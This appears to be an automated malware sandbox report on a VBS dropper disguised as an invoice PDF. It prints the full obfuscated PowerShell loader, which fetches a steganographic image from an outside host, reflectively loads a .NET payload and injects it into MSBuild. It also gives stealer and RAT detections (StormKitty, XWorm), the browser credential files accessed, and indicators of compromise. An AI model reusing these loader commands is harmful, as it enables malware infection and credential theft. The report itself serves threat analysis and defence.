reBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.jhg/moc.ur.wsakodmob//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredcdgtremwdgtrevdgtredcdgtreoqdgtre3dgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredmdgtreodgtredgtre4dgtredidgtremdgtredgtreydgtredkdgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdg
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links \| get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.jhg/moc.ur.wsakodmob//:sptth' , 'desativado' , 'desativado' , 'desativado','msbuild',''))} }"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtredgtrerdgtred0dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqdgtrezqbkdgtreeqdgtreyqb0dgtregedgtreidgtreb9dgtredsdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebdgtredgtrecgdgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdgtrebqbhdgtregcdgtrezqbzdgtrec8dgtremdgtredgtrewdgtredqdgtrelwdgtre3dgtredcdgtremwdgtrevdgtredcdgtreoqdgtre3dgtrec8dgtrebwbydgtregkdgtrezwbpdgtreg4dgtreyqbsdgtrec8dgtrebgbldgtrehcdgtrexwbpdgtreg0dgtreyqbndgtregudgtrelgbqdgtrehdgtredgtrezwdgtre/dgtrededgtrenwdgtrexdgtredmdgtreodgtredgtre4dgtredidgtremdgtredgtreydgtredkdgtrejwdgtresdgtrecdgtredgtrejwbodgtrehqdgtreddgtrebwdgtrehmdgtreogdgtrevdgtrec8dgtredqbwdgtregwdgtrebwbhdgtregqdgtrezdgtrebldgtregkdgtrebqbhdgtregcdgtrezqbudgtrehmdgtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdg	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links \| get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.jhg/moc.ur.wsakodmob//:sptth' , 'desativado' , 'desativado' , 'desativado','msbuild',''))} }"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Yara detected BrowserPasswordDump

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Source: Yara match	File source: 18.2.MSBuild.exe.71f0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.MSBuild.exe.71f0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.2549242088.00000000071F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7876, type: MEMORYSTR

Yara detected StormKitty Stealer

Source: Yara match	File source: 18.2.MSBuild.exe.71f0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.MSBuild.exe.71f0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.2501923304.0000000003091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2549242088.00000000071F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7876, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: 18.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.2491457126.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2501923304.0000000003091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7876, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Source: Yara match	File source: 18.2.MSBuild.exe.71f0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.MSBuild.exe.71f0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.2501923304.0000000003091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2549242088.00000000071F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7876, type: MEMORYSTR

Remote Access Functionality

Yara detected BrowserPasswordDump

Source: Yara match	File source: 18.2.MSBuild.exe.71f0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.MSBuild.exe.71f0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.2549242088.00000000071F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7876, type: MEMORYSTR

Yara detected StormKitty Stealer

Source: Yara match	File source: 18.2.MSBuild.exe.71f0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.MSBuild.exe.71f0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.2501923304.0000000003091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2549242088.00000000071F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7876, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: 18.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.2491457126.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2501923304.0000000003091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7876, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	221 Scripting	Valid Accounts	11 Windows Management Instrumentation	221 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	311 Process Injection	3 Obfuscated Files or Information	LSASS Memory	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	11 Command and Scripting Interpreter	1 Create Account	Logon Script (Windows)	1 Software Packing	Security Account Manager	211 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 PowerShell	1 Office Application Startup	Login Hook	1 DLL Side-Loading	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	231 Virtualization/Sandbox Evasion	SSH	Keylogging	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Modify Registry	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	113 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	231 Virtualization/Sandbox Evasion	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	311 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Factura.PDF______________________________________.vbs	11%	ReversingLabs	Win32.Trojan.Generic
Factura.PDF______________________________________.vbs	11%	Virustotal		Browse

Source	Detection	Scanner	Link
uploaddeimagens.com.br	7%	Virustotal	Browse
fp2e7a.wpc.phicdn.net	0%	Virustotal	Browse
bomdokasw.ru.com	5%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://go.microsoft.co	0%	URL Reputation	safe
https://go.microsoft.co	0%	URL Reputation	safe
http://james.newtonking.com/projects/json	0%	URL Reputation	safe
https://www.google.com;	0%	Avira URL Cloud	safe
http://app01.system.com.br/RDWeb/Pages/login.aspx0	0%	Avira URL Cloud	safe
https://bomdokasw.ru.com/ghj.txt	0%	Avira URL Cloud	safe
http://app01.system.com.br/RDWeb/Pages/login.aspxd	0%	Avira URL Cloud	safe
https://urn.to/r/sds_seeaCould	0%	Avira URL Cloud	safe
http://app01.system.com.br/RDWeb/Pages/login.aspxT	0%	Avira URL Cloud	safe
https://analytics.paste.ee;	0%	Avira URL Cloud	safe
